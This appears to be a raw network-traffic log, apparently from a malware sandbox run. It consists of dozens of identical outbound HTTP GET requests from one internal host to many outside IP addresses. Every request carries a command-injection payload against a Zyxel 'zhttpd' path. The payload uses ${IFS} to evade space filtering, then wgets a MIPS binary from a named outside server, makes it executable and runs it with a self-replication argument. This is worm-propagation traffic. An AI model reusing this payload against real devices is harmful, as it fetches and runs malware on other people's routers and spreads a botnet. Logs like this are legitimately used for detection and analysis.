                                        Jan 14, 2024 16:19:00.848671913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8918192.168.2.1349576193.137.204.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848705053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8919192.168.2.1348198216.196.0.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848753929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8920192.168.2.135328870.183.238.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848783970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8921192.168.2.1354128200.158.90.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848822117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8922192.168.2.1353506103.38.28.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848851919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8923192.168.2.135299882.180.56.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848956108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8924192.168.2.1344128220.167.140.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848990917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8925192.168.2.133557851.171.30.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848994970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8926192.168.2.1347478150.174.234.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.849021912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8927192.168.2.133853476.201.37.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.849071026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8928192.168.2.1356666133.22.243.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.852798939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8929192.168.2.133723069.182.248.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.852830887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8930192.168.2.133594891.20.134.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.852888107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8931192.168.2.1351392151.126.72.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.852930069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8932192.168.2.134353070.71.90.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.852960110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8933192.168.2.135442689.59.86.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.853018045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8934192.168.2.1351232158.253.201.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.853070021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8935192.168.2.1346420103.12.54.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.853100061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8936192.168.2.1345840210.119.235.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.853146076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8937192.168.2.13361029.27.31.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.853172064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8938192.168.2.134592084.93.36.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.853209019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8939192.168.2.1359930201.113.146.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.853244066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8940192.168.2.1359428103.183.58.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.853306055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8941192.168.2.13480882.66.115.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.853353024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8942192.168.2.1353454101.170.78.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.853373051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8943192.168.2.1356564191.66.191.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.853406906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8944192.168.2.1359956193.139.123.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.853477955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8945192.168.2.133943663.122.167.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.853499889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8946192.168.2.134903614.116.175.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.853516102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8947192.168.2.1344918168.187.223.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.853574038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8948192.168.2.134512812.204.103.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.853609085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8949192.168.2.1352086100.209.152.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.852231026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8950192.168.2.1337452167.211.64.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.852380037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8951192.168.2.1355478174.129.145.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.852500916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8952192.168.2.1357726141.101.33.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.852565050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8953192.168.2.133598694.28.240.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.852607012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8954192.168.2.1341576111.123.78.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.852667093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8955192.168.2.135085654.16.167.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.852710962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8956192.168.2.1345724109.10.241.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.852765083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8957192.168.2.1345736126.183.54.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.852826118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8958192.168.2.133804262.72.252.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.852880001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8959192.168.2.135245492.159.161.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.852940083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8960192.168.2.135799884.237.39.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.853009939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8961192.168.2.1339610188.17.156.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.853070974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8962192.168.2.1352074191.242.126.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.853137970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8963192.168.2.1350446139.79.129.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.853198051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8964192.168.2.1333492165.230.219.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.853243113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8965192.168.2.1348512197.32.242.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.853318930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8966192.168.2.1352138163.113.199.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.853362083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8967192.168.2.133544248.189.131.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.853416920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8968192.168.2.1337806186.252.84.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.853455067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8969192.168.2.1354550192.113.1.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.853492022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8970192.168.2.134245042.157.31.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.853564978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8971192.168.2.1355752197.92.147.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.853635073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8972192.168.2.1344812179.239.30.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.853693008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8973192.168.2.133404886.168.158.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.853750944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8974192.168.2.1340026211.52.72.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.853781939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8975192.168.2.135195842.107.69.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.853841066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8976192.168.2.134880886.52.156.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.853907108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8977192.168.2.135544887.175.203.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.853945017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8978192.168.2.1337746103.132.138.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.854008913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8979192.168.2.1358524151.69.231.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.854080915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8980192.168.2.133350858.142.229.158443
                                        TimestampBytes transferredDirectionData
